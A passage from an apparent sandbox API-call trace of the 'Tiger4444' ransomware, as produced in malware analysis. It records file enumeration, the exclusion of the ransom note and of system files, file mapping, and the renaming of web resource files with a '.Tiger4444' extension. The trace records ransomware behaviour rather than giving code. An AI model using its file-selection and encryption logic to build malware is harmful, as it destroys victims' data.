(in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 2327 [0041.535] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bb141, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bb141, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1687, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default.css", cAlternateFileName="")) returned 1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="Tiger4444.exe") returned -1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2=".") returned 1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="..") returned 1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="windows") returned -1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="bootmgr") returned 1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="pagefile.sys") returned -1 [0041.535] lstrcmpiW (lpString1="default.css", lpString2="boot") returned 1 [0041.536] lstrcmpiW (lpString1="default.css", lpString2="ids.txt") returned -1 [0041.536] lstrcmpiW (lpString1="default.css", lpString2="NTUSER.DAT") returned -1 [0041.536] lstrcpyW (in: lpString1=0x30aeaea, lpString2="default.css" | out: lpString1="default.css") returned="default.css" [0041.536] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css", dwFileAttributes=0x0) returned 1 [0041.536] lstrlenW (lpString="default.css") returned 11 [0041.536] lstrlenW (lpString="Tiger4444") returned 9 [0041.536] lstrcmpiW (lpString1="fault.css", lpString2="Tiger4444") returned -1 [0041.536] lstrlenW (lpString=".dll") returned 4 [0041.536] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0041.536] lstrlenW (lpString=".lnk") returned 4 [0041.536] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0041.536] lstrlenW (lpString=".ini") returned 4 [0041.536] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0041.536] lstrlenW (lpString=".sys") returned 4 [0041.536] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0041.536] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.536] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.536] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13298953723) returned 1 [0041.536] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5767) returned 1 [0041.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0041.537] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0041.537] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1990, lpName=0x0) returned 0x2c8 [0041.538] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1990) returned 0xbe0000 [0041.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0041.539] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0041.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.539] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0041.539] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0041.540] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13299265735) returned 1 [0041.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0041.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0041.540] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.540] CloseHandle (hObject=0x2c8) returned 1 [0041.540] CloseHandle (hObject=0x260) returned 1 [0041.541] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default.css.Tiger4444") returned 54 [0041.541] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default.css.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css.tiger4444"), dwFlags=0x1) returned 1 [0041.542] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=5776 | out: Addend=0xc6f980) returned 4056064 [0041.542] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 2330 [0041.542] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bc4cd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bc4cd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xf44d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default.htm", cAlternateFileName="")) returned 1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="Tiger4444.exe") returned -1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2=".") returned 1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="..") returned 1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="windows") returned -1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="bootmgr") returned 1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="pagefile.sys") returned -1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="boot") returned 1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="ids.txt") returned -1 [0041.542] lstrcmpiW (lpString1="default.htm", lpString2="NTUSER.DAT") returned -1 [0041.542] lstrcpyW (in: lpString1=0x30aeaea, lpString2="default.htm" | out: lpString1="default.htm") returned="default.htm" [0041.542] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm", dwFileAttributes=0x0) returned 1 [0041.542] lstrlenW (lpString="default.htm") returned 11 [0041.542] lstrlenW (lpString="Tiger4444") returned 9 [0041.542] lstrcmpiW (lpString1="fault.htm", lpString2="Tiger4444") returned -1 [0041.542] lstrlenW (lpString=".dll") returned 4 [0041.542] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0041.542] lstrlenW (lpString=".lnk") returned 4 [0041.542] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0041.542] lstrlenW (lpString=".ini") returned 4 [0041.543] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0041.543] lstrlenW (lpString=".sys") returned 4 [0041.543] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0041.543] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.543] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.543] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13299589978) returned 1 [0041.543] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=62541) returned 1 [0041.543] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0041.543] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0041.543] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf750, lpName=0x0) returned 0x2c8 [0041.544] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf750) returned 0xbe0000 [0041.645] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.646] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0041.646] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.646] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0041.646] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.646] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0041.646] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.646] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0041.646] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13309913571) returned 1 [0041.646] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0041.646] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0041.646] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.647] CloseHandle (hObject=0x2c8) returned 1 [0041.647] CloseHandle (hObject=0x260) returned 1 [0041.649] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default.htm.Tiger4444") returned 54 [0041.649] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm.tiger4444"), dwFlags=0x1) returned 1 [0041.650] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=62544 | out: Addend=0xc6f980) returned 4061840 [0041.650] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=103 | out: Addend=0xc6f98c) returned 2333 [0041.650] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bd859, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bd859, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x13e24500, ftLastWriteTime.dwHighDateTime=0x1d2ee61, nFileSizeHigh=0x0, nFileSizeLow=0x1a2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_eos.css", cAlternateFileName="DEFAUL~1.CSS")) returned 1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="Tiger4444.exe") returned -1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2=".") returned 1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="..") returned 1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="windows") returned -1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="bootmgr") returned 1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="pagefile.sys") returned -1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="boot") returned 1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="ids.txt") returned -1 [0041.650] lstrcmpiW (lpString1="default_eos.css", lpString2="NTUSER.DAT") returned -1 [0041.651] lstrcpyW (in: lpString1=0x30aeaea, lpString2="default_eos.css" | out: lpString1="default_eos.css") returned="default_eos.css" [0041.651] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css", dwFileAttributes=0x0) returned 1 [0041.651] lstrlenW (lpString="default_eos.css") returned 15 [0041.651] lstrlenW (lpString="Tiger4444") returned 9 [0041.651] lstrcmpiW (lpString1="t_eos.css", lpString2="Tiger4444") returned -1 [0041.651] lstrlenW (lpString=".dll") returned 4 [0041.651] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0041.651] lstrlenW (lpString=".lnk") returned 4 [0041.652] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0041.652] lstrlenW (lpString=".ini") returned 4 [0041.652] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0041.652] lstrlenW (lpString=".sys") returned 4 [0041.652] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0041.652] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.652] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.652] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13310486859) returned 1 [0041.652] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=6700) returned 1 [0041.652] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0041.652] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0041.652] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d30, lpName=0x0) returned 0x2c8 [0041.654] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d30) returned 0xbe0000 [0041.665] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.665] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0041.665] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.665] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0041.665] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.665] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0041.665] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.665] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0041.665] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13311856534) returned 1 [0041.666] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0041.666] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0041.666] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.666] CloseHandle (hObject=0x2c8) returned 1 [0041.666] CloseHandle (hObject=0x260) returned 1 [0041.667] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.Tiger4444") returned 58 [0041.667] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css.tiger4444"), dwFlags=0x1) returned 1 [0041.668] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=6704 | out: Addend=0xc6f980) returned 4124384 [0041.668] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=13 | out: Addend=0xc6f98c) returned 2436 [0041.668] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bff6c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bff6c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea75e900, ftLastWriteTime.dwHighDateTime=0x1d2ee61, nFileSizeHigh=0x0, nFileSizeLow=0xda3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_eos.htm", cAlternateFileName="DEFAUL~1.HTM")) returned 1 [0041.668] lstrcmpiW (lpString1="default_eos.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.668] lstrcmpiW (lpString1="default_eos.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.668] lstrcmpiW (lpString1="default_eos.htm", lpString2="Tiger4444.exe") returned -1 [0041.668] lstrcmpiW (lpString1="default_eos.htm", lpString2=".") returned 1 [0041.668] lstrcmpiW (lpString1="default_eos.htm", lpString2="..") returned 1 [0041.668] lstrcmpiW (lpString1="default_eos.htm", lpString2="windows") returned -1 [0041.669] lstrcmpiW (lpString1="default_eos.htm", lpString2="bootmgr") returned 1 [0041.669] lstrcmpiW (lpString1="default_eos.htm", lpString2="pagefile.sys") returned -1 [0041.669] lstrcmpiW (lpString1="default_eos.htm", lpString2="boot") returned 1 [0041.669] lstrcmpiW (lpString1="default_eos.htm", lpString2="ids.txt") returned -1 [0041.669] lstrcmpiW (lpString1="default_eos.htm", lpString2="NTUSER.DAT") returned -1 [0041.669] lstrcpyW (in: lpString1=0x30aeaea, lpString2="default_eos.htm" | out: lpString1="default_eos.htm") returned="default_eos.htm" [0041.669] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm", dwFileAttributes=0x0) returned 1 [0041.669] lstrlenW (lpString="default_eos.htm") returned 15 [0041.669] lstrlenW (lpString="Tiger4444") returned 9 [0041.669] lstrcmpiW (lpString1="t_eos.htm", lpString2="Tiger4444") returned -1 [0041.669] lstrlenW (lpString=".dll") returned 4 [0041.669] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0041.669] lstrlenW (lpString=".lnk") returned 4 [0041.669] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0041.669] lstrlenW (lpString=".ini") returned 4 [0041.669] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0041.669] lstrlenW (lpString=".sys") returned 4 [0041.669] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0041.669] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.669] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.669] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13312260199) returned 1 [0041.670] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=55866) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0041.670] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0041.670] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdd40, lpName=0x0) returned 0x2c8 [0041.671] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdd40) returned 0xbe0000 [0041.673] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.673] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0041.673] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.673] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0041.673] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0041.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0041.674] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13312686720) returned 1 [0041.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0041.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0041.674] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.674] CloseHandle (hObject=0x2c8) returned 1 [0041.674] CloseHandle (hObject=0x260) returned 1 [0041.676] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.Tiger4444") returned 58 [0041.676] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm.tiger4444"), dwFlags=0x1) returned 1 [0041.677] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=55872 | out: Addend=0xc6f980) returned 4131088 [0041.677] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 2449 [0041.677] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c12fc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c12fc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_oobe.css", cAlternateFileName="DEFAUL~2.CSS")) returned 1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="Tiger4444.exe") returned -1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2=".") returned 1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="..") returned 1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="windows") returned -1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="bootmgr") returned 1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="pagefile.sys") returned -1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="boot") returned 1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="ids.txt") returned -1 [0041.677] lstrcmpiW (lpString1="default_oobe.css", lpString2="NTUSER.DAT") returned -1 [0041.677] lstrcpyW (in: lpString1=0x30aeaea, lpString2="default_oobe.css" | out: lpString1="default_oobe.css") returned="default_oobe.css" [0041.677] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css", dwFileAttributes=0x0) returned 1 [0041.678] lstrlenW (lpString="default_oobe.css") returned 16 [0041.678] lstrlenW (lpString="Tiger4444") returned 9 [0041.678] lstrcmpiW (lpString1="_oobe.css", lpString2="Tiger4444") returned -1 [0041.678] lstrlenW (lpString=".dll") returned 4 [0041.678] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0041.678] lstrlenW (lpString=".lnk") returned 4 [0041.678] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0041.678] lstrlenW (lpString=".ini") returned 4 [0041.678] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0041.678] lstrlenW (lpString=".sys") returned 4 [0041.678] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0041.678] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.678] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.678] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13313134545) returned 1 [0041.678] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5224) returned 1 [0041.678] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0041.678] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0041.678] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1770, lpName=0x0) returned 0x2c8 [0041.680] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1770) returned 0xbe0000 [0041.692] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.692] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0041.692] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.692] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0041.692] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.692] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0041.692] HeapFree (in: 